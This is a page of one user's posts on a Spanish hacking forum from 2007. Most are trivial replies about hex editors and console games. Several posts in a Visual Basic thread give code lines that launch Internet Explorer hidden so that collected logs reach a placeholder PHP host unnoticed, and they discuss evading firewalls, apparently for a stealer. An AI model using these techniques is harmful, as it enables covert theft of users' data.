elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Recuerda que debes registrarte en el foro para poder participar (preguntar y responder)


  Mostrar Mensajes
Páginas: 1 2 3 4 [5] 6 7 8 9 10 11 12
41  Seguridad Informática / Hacking / Re: Guia Hacking *COMO CONVERTIRSE EN HACKER* en: 8 Agosto 2007, 20:32 pm
En cambio, para convertirse en lammer solo hay que leer los lame-trucos para hackear hotmail de otros lammers y modificarlos para ser tú más lammer aún.
42  Informática / Software / Re: Mejor editor Hexadecimal?? (WinHex,quizá?) en: 2 Agosto 2007, 22:51 pm
También tienes el XVI32, no sé si será muy completo... para lo poco que lo uso me sirve. Pesa 1 Mb.
43  Media / Juegos y Consolas / ¿Es posible usar cualquier disco duro para ejecutar backups de PS2? en: 30 Julio 2007, 18:35 pm
Buenas.

Me gustaría saber si es posible usar un disco duro externo en la PS2, ya que esta tiene puertos USB, y ejecutar copias de seguridad de los juegos. Me parece que se pueden ejecutar aplicaciones basadas en Linux ¿es cierto?
Voy a seguir googleando... aún que no encuentro lo que necesito.

Edit:

Hay una solución: HD Extreme. Lo malo es que hay que comprarlo, ya que el CD tiene unos aros en la parte que se lee, así que no lo puedes grabar desde tu pc.
44  Informática / Tutoriales - Documentación / Re: Descargar música con Google, como si se tratate de un p2p en: 26 Julio 2007, 22:40 pm
Uhm... Tienen que ser canciones que no lleven eñes >.<
45  Media / Juegos y Consolas / Re: Que significan estas magias?? FFVIII - PSX en: 21 Junio 2007, 15:38 pm
ePSXe / Plugins.
46  Media / Juegos y Consolas / Re: Que significan estas magias?? FFVIII - PSX en: 21 Junio 2007, 15:25 pm
Gameshark / Action Replay.
47  Programación / Programación Visual Basic / Re: Necesito ideas (formas) de transferir un log sin ser detectado. en: 25 Abril 2007, 09:21 am
Código:
Shell "C:\ruta\iexplore.exe http://tuweb.es/tal.php?tal=tal", vbHide

La última pregunta no la entiendo, EN PRINCIPIO porque va a ser detectable abrir una web con internetexplorer? y que mas dá si es un php o un html? y para que enviar los datos a ningún sitio?
Dónde tengas hospedado el php haces que cree un archivo log.txt con el contenido de la variable tal= y yastá. :S

Perdona, no sé mucho de HTML, y de PHP no se nada. Será por eso que he dicho algo incoherente, bueno ya me las apañaré. Gracias de todos modos.
48  Programación / Programación Visual Basic / Re: Necesito ideas (formas) de transferir un log sin ser detectado. en: 23 Abril 2007, 19:45 pm
en bat

@start iexplorer.exe http://....

en vb sera casi igual

shell....


hay una forma q es indetectable pero un poco brusca es que cree una web en html que al ser ejecutada se te envien los datos y luego se cierre automatic.

Gracias, pero no sé como hacer que no sea visible el iexplore. En cuanto a lo de transferir, haré que se cargue un .php que me envie los datos por ftp. Supongo que eso es indetectable ¿no?
49  Programación / Programación Visual Basic / Re: Necesito ideas (formas) de transferir un log sin ser detectado. en: 23 Abril 2007, 17:54 pm
Haces que tu programa lance el iexplore de forma oculta así:
iexplore.exe http://tuweb.com/pillalogs.php?log="tusdatosblabla"
Luego tu php que guarde esa variable en un archivo y listo.

La mayoría de firewalls no lo pillan, pero hay bastantes que si. Para que no te cace ningún firewall el único método realmente efectivo es la inyección.

Gracias MazarD, pero no tendrás algún ejemplo de eso de "lanzar el iexplorer con esa web de forma oculta". Por que no tengo mucha idea. Sobre lo del php ya me las arreglaré, pero eso de lanzar el iexplorer oculto me interesa.
50  Programación / Programación Visual Basic / Re: Necesito ideas (formas) de transferir un log sin ser detectado. en: 22 Abril 2007, 20:28 pm
Yo lo que necesito es transferir los datos, ya me las apañaré para conseguirlos. Gracias de todos modos.

Por cierto... un .php puede enviar un archivo por ftp? Lo que si que se puede es, desde flash (que el firewall no bloquea), enviar datos. Voy a seguir investigando. A ver si alguien me puede ayudar.
Páginas: 1 2 3 4 [5] 6 7 8 9 10 11 12
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines